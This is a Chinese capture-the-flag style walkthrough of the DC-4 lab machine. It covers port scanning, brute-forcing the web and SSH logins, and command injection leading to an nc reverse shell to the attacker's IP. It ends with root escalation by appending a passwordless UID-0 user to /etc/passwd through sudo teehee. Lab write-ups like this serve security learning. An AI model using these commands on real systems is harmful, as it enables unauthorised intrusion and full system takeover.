5.DC4

DC-4

关于环境的搭建 , 大家可以自行百度

网络桥接

渗透机 kali

靶机 dc-4

0x01. 信息收集

老规矩就是那一套 , 然后找到靶机的真实ip , 扫描一下全端口

nmap 192.168.0.151

image-20210619155607796

可以看到只开放了 80 和 22端口 , 访问一下80端口

image-20210619155759547

是一个admin登录页面 , 可以看到是没有验证码的 , 尝试暴力破解 , 拿出我的大字典 , 最终爆出来是

admin    happy

0x02. 漏洞发现和利用

1. 获取shell

然后登录进入会发现有一个命令执行的漏洞

image-20210619160900753

抓包 , 改包 , 尝试修改参数 , 发现果然有命令执行漏洞

一般linux(nmap扫一下)上都有nc , 我们通过nc反弹一个shell

nc -e /bin/sh 192.168.0.110 4445

image-20210619161245495

image-20210619161125655

然后通过python进入交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20210619161524675

通过查看/etc/passwd文件 , 发现有

image-20210619162537602

既然有三个用户 , 那么就分别进去看看家目录下有什么 , 一般靶机的hint都喜欢在家目录下 , 最后在jim的家目录

下发现了 backups

image-20210619162744505

然后在里面发现了以前的老密码

image-20210619163036376

然后使用hydra尝试对那三个用户爆破

hydra -L user.dic -P passwd.txt -vV -f 192.168.0.151 ssh

爆出一个账号的密码

jim
jibril04

然后ssh连接 , 在登录信息后有一个mail

image-20210619164437382

find / -name "mail"    找寻名字叫mail的 , 搜索的结果是/var/mail

image-20210619164626638

在里面发现了charles给他发的邮件 , 里面有他的密码 , 切换用户charles

2. 提权

sudo -l

image-20210619164854646

发现了一个teehee命令 , 这个命令可以往一个文件追加内容 , 可以通过他向/etc/passwd写入文件

echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
#如:admin:x:0:0::/home/admin:/bin/bash #[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]

切换test用户 , 拿到最后的flag

image-20210619165204828

0x03. 总结

1. fuzzing测试2.nc 反弹shell3. 交互式shell4. 提权
原文地址:https://www.cnblogs.com/xcymn/p/15712497.html